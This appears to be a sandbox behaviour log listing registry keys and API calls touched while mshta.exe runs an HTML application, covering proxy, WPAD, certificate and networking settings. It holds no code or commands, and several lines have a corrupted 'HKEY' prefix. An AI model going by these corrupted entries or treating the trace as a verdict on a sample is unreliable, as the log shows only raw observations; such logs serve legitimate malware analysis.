HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\SessionStartTimeDefaultDeltaSecs
HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\MBCSAPIforCrack
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_HTTP_USERNAME_PASSWORD_DISABLE\mshta.exe
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_HTTP_USERNAME_PASSWORD_DISABLE\*
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_CLIENTAUTHCERTFILTER
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_CLIENTAUTHCERTFILTER
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_MIME_HANDLING\mshta.exe
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_MIME_HANDLING\*
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_DISABLE_UNICODE_HANDLE_CLOSING_CALLBACK\mshta.exe
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_DISABLE_UNICODE_HANDLE_CLOSING_CALLBACK\*
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\FromCacheTimeout
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\SecureProtocols
HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\SecureProtocols
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\SecureProtocols
\x6e08\x160EY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\CertificateRevocation
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\DisableKeepAlive
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\IdnEnabled
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\PreConnectLimit
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\PreResolveLimit
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\SqmHttpStreamRandomUploadPoolSize
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\CacheMode
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\EnableHttp1_1
HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\EnableHttp1_1
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\EnableHttp1_1
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\ProxyHttp1.1
HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\ProxyHttp1.1
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ProxyHttp1.1
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ProxyHttp1.1
\x6e08\x160EY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\EnableNegotiate
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\DisableBasicOverClearChannel
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ClientAuthBuiltInUI
HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\EnableAutoProxyResultCache
HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\DisplayScriptDownloadFailureUI
HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\MBCSServername
HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\UTF8ServerNameRes
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\DisableReadRange
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\SocketSendBufferLength
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\SocketReceiveBufferLength
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\KeepAliveTimeout
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\MaxHttpRedirects
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\MaxConnectionsPerServer
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\MaxConnectionsPerServer
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\MaxConnectionsPer1_0Server
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\MaxConnectionsPer1_0Server
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\MaxConnectionsPerProxy
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ServerInfoTimeout
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ConnectTimeOut
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ConnectTimeOut
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ConnectRetries
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ConnectRetries
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\SendTimeOut
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\SendTimeOut
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ReceiveTimeOut
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ReceiveTimeOut
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\DisableNTLMPreAuth
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ScavengeCacheLowerBound
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\CertCacheNoValidate
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\ScavengeCacheFileLifeTime
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\Security_HKLM_only
HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\ScavengeCacheFileLimit
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\ScavengeCacheFileLimit
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\ScavengeCacheFileLimit
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\HttpDefaultExpiryTimeSecs
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\FtpDefaultExpiryTimeSecs
\x6e08\x160EY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\DisableCachingOfSSLPages
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\LeashLegacyCookies
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\DialupUseLanSettings
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\DialupUseLanSettings
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\SendExtraCRLF
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\WpadSearchAllDomains
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\BypassHTTPNoCacheCheck
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\BypassHTTPNoCacheCheck
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\BypassSSLNoCacheCheck
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\BypassSSLNoCacheCheck
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\EnableHttpTrace
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\NoCheckAutodialOverRide
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\NoCheckAutodialOverRide
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\DontUseDNSLoadBalancing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\DontUseDNSLoadBalancing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ShareCredsWithWinHttp
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\MimeExclusionListForCache
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\HeaderExclusionListForCache
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\DnsCacheEnabled
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\DnsCacheEntries
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\DnsCacheTimeout
\x6e08\x160EY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\WarnOnPost
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\WarnAlwaysOnPost
\x6e08\x160EY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\WarnOnZoneCrossing
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\WarnOnBadCertRecving
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\WarnOnPostRedirect
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\AlwaysDrainOnRedirect
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\WarnOnHTTPSToHTTPRedirect
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\TcpAutotuning
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\ProxySettingsPerUser
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\EnableLegacyAutoProxyFeatures
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\BadProxyExpiresTime
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\AutoProxyDetectType
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\WpadOverride
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\DisableBranchCache
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\UseFirstAvailable
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\CombineFalseStartData
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\DisableFalseStartBlocklist
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\EnforceP3PValidity
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\DuoProtocols
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\EnableSpdyDebugAsserts
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\DefaultConnectionSettings
\x6e08\x160EY_LOCAL_MACHINE\SYSTEM\Setup\SystemSetupInProgress
\x6e08\x160EY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\MigrateProxy
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ProxyEnable
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ProxyServer
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ProxyOverride
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\AutoConfigURL
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\AutoDetect
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\SavedLegacySettings
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_XSSFILTER\mshta.exe
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_XSSFILTER\*
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\User Agent\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\User Agent\(Default)
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\User Agent\Compatible
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\User Agent\Compatible
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\User Agent\Version
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\User Agent\Version
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\User Agent\Platform
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\User Agent\Platform
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_MAXCONNECTIONSPERSERVER\mshta.exe
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_MAXCONNECTIONSPERSERVER\*
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_MAXCONNECTIONSPER1_0SERVER\mshta.exe
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_MAXCONNECTIONSPER1_0SERVER\*
HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\EnableUTF8
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\UrlEncoding
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Control Panel\UTF8URLQuery
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\1A10
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\CTF\TIP\{0000897b-83df-4b96-be07-0fb58b01c4a4}\LanguageProfile\0x00000000\{0001bea3-ed56-483d-a2e2-aeae25577436}\Enable
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\CTF\EnableAnchorContext
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{618736E0-3C3D-11CF-810C-00AA00389B71}\ProxyStubClsid32\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{332C4425-26CB-11D0-B483-00C04FD90119}\ProxyStubClsid32\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{00020424-0000-0000-C000-000000000046}\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{00020424-0000-0000-C000-000000000046}\InprocServer32\InprocServer32
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{00020424-0000-0000-C000-000000000046}\InprocServer32\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{00020424-0000-0000-C000-000000000046}\InprocServer32\ThreadingModel
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{26656EAA-54EB-4E6F-8F85-4F0EF901A406}\ProxyStubClsid32\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{8A40A45D-055C-4B62-ABD7-6D613E2CEAEC}\ProxyStubClsid32\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_MSHTML_AUTOLOAD_IEFRAME\mshta.exe
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{55272A00-42CB-11CE-8135-00AA004BB851}\ProxyStubClsid32\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B196B286-BAB4-101A-B69C-00AA00341D07}\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B196B286-BAB4-101A-B69C-00AA00341D07}\InprocServer32\InprocServer32
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B196B286-BAB4-101A-B69C-00AA00341D07}\InprocServer32\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B196B286-BAB4-101A-B69C-00AA00341D07}\InprocServer32\ThreadingModel
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{BCD1DE7E-2DB1-418B-B047-4A74E101F8C1}\ProxyStubClsid32\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{2A1C9EB2-DF62-4154-B800-63278FCB8037}\ProxyStubClsid32\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\Windows Error Reporting\WMR\Disable
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{9F64103F-F384-44A8-88B3-DFA27402741D}\WpadDecision
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{9F64103F-F384-44A8-88B3-DFA27402741D}\WpadDecisionTime
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\WpadExpirationDays
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{9F64103F-F384-44A8-88B3-DFA27402741D}\WpadDecisionReason
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{9F64103F-F384-44A8-88B3-DFA27402741D}\WpadDhcp
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{9F64103F-F384-44A8-88B3-DFA27402741D}\WpadDns
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{9F64103F-F384-44A8-88B3-DFA27402741D}\WpadDetectedUrl
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\52-54-00-6f-d4-05\WpadDecision
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\52-54-00-6f-d4-05\WpadDecisionTime
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\52-54-00-6f-d4-05\WpadDecisionReason
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\52-54-00-6f-d4-05\WpadDhcp
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\52-54-00-6f-d4-05\WpadDns
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\52-54-00-6f-d4-05\WpadDetectedUrl
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\NetBT\Linkage\Export
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\FontCache\Parameters\ClientCacheSize
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Direct3D\DriverCompat\Size
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Direct3D\DriverCompat\Name
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Direct3D\Drivers\Size
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Direct3D\Drivers\Name
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Direct3D\DX6TextureEnumInclusionList\Size
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Direct3D\DX6TextureEnumInclusionList\Name
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\OperationalData
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\BrowserEmulation\CVListXMLVersionLow
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\BrowserEmulation\CVListXMLVersionHigh
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\BrowserEmulation\IECompatVersionLow
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\BrowserEmulation\IECompatVersionHigh
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_RESTRICT_FILEDOWNLOAD\mshta.exe
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_RESTRICT_FILEDOWNLOAD\*
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\Locale\00000409
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\Language Groups\1
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\PrefetchPrerender\Enabled
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ProxyEnable
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\SavedLegacySettings
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\52-54-00-6f-d4-05\WpadDecisionReason
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\52-54-00-6f-d4-05\WpadDecisionTime
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\52-54-00-6f-d4-05\WpadDecision
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\52-54-00-6f-d4-05\WpadDetectedUrl
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{9F64103F-F384-44A8-88B3-DFA27402741D}\WpadDecisionReason
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{9F64103F-F384-44A8-88B3-DFA27402741D}\WpadDecisionTime
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{9F64103F-F384-44A8-88B3-DFA27402741D}\WpadDecision
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{9F64103F-F384-44A8-88B3-DFA27402741D}\WpadNetworkName
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ProxyServer
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ProxyOverride
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\AutoConfigURL
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\AutoDetect
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{9F64103F-F384-44A8-88B3-DFA27402741D}\WpadDetectedUrl
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\52-54-00-6f-d4-05\WpadDetectedUrl
ntdll.dll.RtlDllShutdownInProgress
comctl32.dll.#329
linkinfo.dll.IsValidLinkInfo
propsys.dll.#407
propsys.dll.PropVariantToGUID
propsys.dll.PSGetNameFromPropertyKey
propsys.dll.PSStringFromPropertyKey
propsys.dll.InitVariantFromBuffer
oleaut32.dll.#9
propsys.dll.PSLookupPropertyHandlerCLSID
advapi32.dll.RegOpenKeyExW
advapi32.dll.RegQueryValueExW
advapi32.dll.RegCloseKey
propsys.dll.PSCreatePropertyStoreFromObject
oleaut32.dll.#6
propsys.dll.PropVariantToStringAlloc
ole32.dll.CoTaskMemRealloc
ole32.dll.CLSIDFromString
comctl32.dll.#388
comctl32.dll.#321
shell32.dll.#66
ole32.dll.CoGetMalloc
ole32.dll.CoAllowSetForegroundWindow
ole32.dll.CoCreateInstance
secur32.dll.GetUserNameExW
api-ms-win-downlevel-shlwapi-l1-1-0.dll.PathCreateFromUrlW
shell32.dll.SHGetFolderPathW
api-ms-win-downlevel-advapi32-l2-1-0.dll.ConvertStringSidToSidW
advapi32.dll.SaferGetPolicyInformation
sfc.dll.SfcIsFileProtected
ole32.dll.OleUninitialize
ole32.dll.CoRevokeInitializeSpy
cryptsp.dll.CryptReleaseContext
kernelbase.dll.SetThreadStackGuarantee
api-ms-win-downlevel-advapi32-l1-1-0.dll.UnregisterTraceGuids
oleaut32.dll.#500
cryptbase.dll.SystemFunction036
kernel32.dll.HeapSetInformation
kernel32.dll.RegisterApplicationRestart
mshtml.dll.RunHTMLApplication
ole32.dll.OleInitialize
shlwapi.dll.PathRemoveArgsW
urlmon.dll.CreateURLMonikerEx
kernel32.dll.SortGetHandle
kernel32.dll.SortCloseHandle
api-ms-win-downlevel-ole32-l1-1-0.dll.CoCreateInstance
api-ms-win-downlevel-ole32-l1-1-0.dll.CoInitializeEx
api-ms-win-downlevel-shlwapi-l2-1-0.dll.IUnknown_QueryService
shlwapi.dll.#29
api-ms-win-downlevel-ole32-l1-1-0.dll.CoTaskMemFree
oleaut32.dll.#4
oleaut32.dll.#7
urlmon.dll.#485
shell32.dll.SHCreateAssociationRegistration
api-ms-win-downlevel-advapi32-l1-1-0.dll.GetTokenInformation
secur32.dll.GetUserNameExA
api-ms-win-downlevel-advapi32-l1-1-0.dll.GetSidSubAuthorityCount
api-ms-win-downlevel-advapi32-l1-1-0.dll.GetSidSubAuthority
api-ms-win-downlevel-advapi32-l1-1-0.dll.RegCreateKeyExA
api-ms-win-downlevel-advapi32-l1-1-0.dll.RegQueryValueExA
api-ms-win-downlevel-advapi32-l1-1-0.dll.RegOpenKeyExW
api-ms-win-downlevel-advapi32-l1-1-0.dll.RegGetValueW
api-ms-win-downlevel-advapi32-l1-1-0.dll.RegCloseKey
shell32.dll.SHGetKnownFolderPath
api-ms-win-downlevel-advapi32-l1-1-0.dll.CopySid
api-ms-win-downlevel-advapi32-l2-1-0.dll.ConvertSidToStringSidW
api-ms-win-downlevel-advapi32-l2-1-0.dll.ConvertStringSecurityDescriptorToSecurityDescriptorW
api-ms-win-downlevel-advapi32-l1-1-0.dll.EventRegister
api-ms-win-downlevel-advapi32-l1-1-0.dll.RegGetValueA
iertutil.dll.#701
iertutil.dll.#703
iertutil.dll.#702
api-ms-win-downlevel-advapi32-l1-1-0.dll.RegOpenKeyExA
api-ms-win-downlevel-ole32-l1-1-0.dll.CoTaskMemAlloc
ws2_32.dll.#115
ws2_32.dll.#111
iertutil.dll.#791
api-ms-win-downlevel-advapi32-l1-1-0.dll.RegQueryValueExW
api-ms-win-downlevel-advapi32-l1-1-0.dll.EventActivityIdControl
api-ms-win-downlevel-advapi32-l1-1-0.dll.RegCreateKeyExW
ws2_32.dll.#23
iphlpapi.dll.GetBestInterfaceEx
ws2_32.dll.#21
ws2_32.dll.WSAIoctl
ws2_32.dll.#3
ws2_32.dll.#116
iphlpapi.dll.NotifyIpInterfaceChange
iphlpapi.dll.GetIfEntry2
api-ms-win-downlevel-shlwapi-l2-1-0.dll.SHGetValueA
api-ms-win-downlevel-advapi32-l1-1-0.dll.RegSetValueExW
api-ms-win-downlevel-advapi32-l1-1-0.dll.RegDeleteValueW
urlmon.dll.CoInternetGetSession
urlmon.dll.#471
iphlpapi.dll.NotifyUnicastIpAddressChange
api-ms-win-downlevel-shlwapi-l2-1-0.dll.SHStrDupW
ole32.dll.CoTaskMemAlloc
dnsapi.dll.DnsGetProxyInformation
rpcrt4.dll.NdrClientCall2
rpcrt4.dll.RpcStringBindingComposeW
rpcrt4.dll.RpcBindingFromStringBindingW
rpcrt4.dll.RpcStringFreeW
rpcrt4.dll.RpcBindingFree
api-ms-win-downlevel-advapi32-l1-1-0.dll.EventWrite
iphlpapi.dll.GetAdaptersAddresses
ws2_32.dll.GetAddrInfoW
